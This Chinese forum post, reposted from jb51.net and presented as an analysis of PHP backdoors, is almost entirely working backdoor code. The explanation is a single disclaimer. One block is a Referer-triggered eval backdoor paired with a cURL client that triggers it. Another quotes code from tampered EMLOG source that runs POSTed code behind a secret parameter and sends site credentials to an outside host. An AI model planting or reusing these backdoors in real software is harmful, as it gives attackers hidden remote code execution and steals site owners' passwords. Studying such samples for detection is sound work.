• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    一些常见的PHP后门原理分析

    发布者: 酸菜鱼 | 发布时间: 2025-6-27 16:00| 查看数: 50| 评论数: 0|帖子模式

    本地测试结果如下图。

    本程序只作为学习作用,请勿拿去做坏事。


    复制代码代码如下:
    <?php
    //1.php
    header('Content-type:text/html;charset=utf-8');
    parse_str($_SERVER['HTTP_REFERER'], $a);
    if(reset($a) == '10' && count($a) == 9) {
    eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
    }<?php
    //2.php
    header('Content-type:text/html;charset=utf-8');
    //要执行的代码
    $code = <<<CODE
    phpinfo();
    CODE;
    //进行base64编码
    $code = base64_encode($code);
    //构造referer字符串
    $referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
    //后门url
    $url = 'http://localhost/test1/1.php';
    $ch = curl_init();
    $options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
    );
    curl_setopt_array($ch, $options);
    echo curl_exec($ch);




    最近EMLOG源代码被污染,有些用户下载的出现了以下的后门代码


    复制代码代码如下:
    if (isset($_GET["rsdsrv"])) {
    if($_GET["rsdsrv"] == "20c6868249a44b0ab92146eac6211aeefcf68eec"){
    @preg_replace("//e",$_POST['IN_EMLOG'],"Unauthorization");
    }
    }
    file_get_contents("http://某域名/?url=".base64_encode($_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'])."&username=".base64_encode($username)."&password=".base64_encode($password));


    来源:https://www.jb51.net/hack/145552.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?立即注册

    ×

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表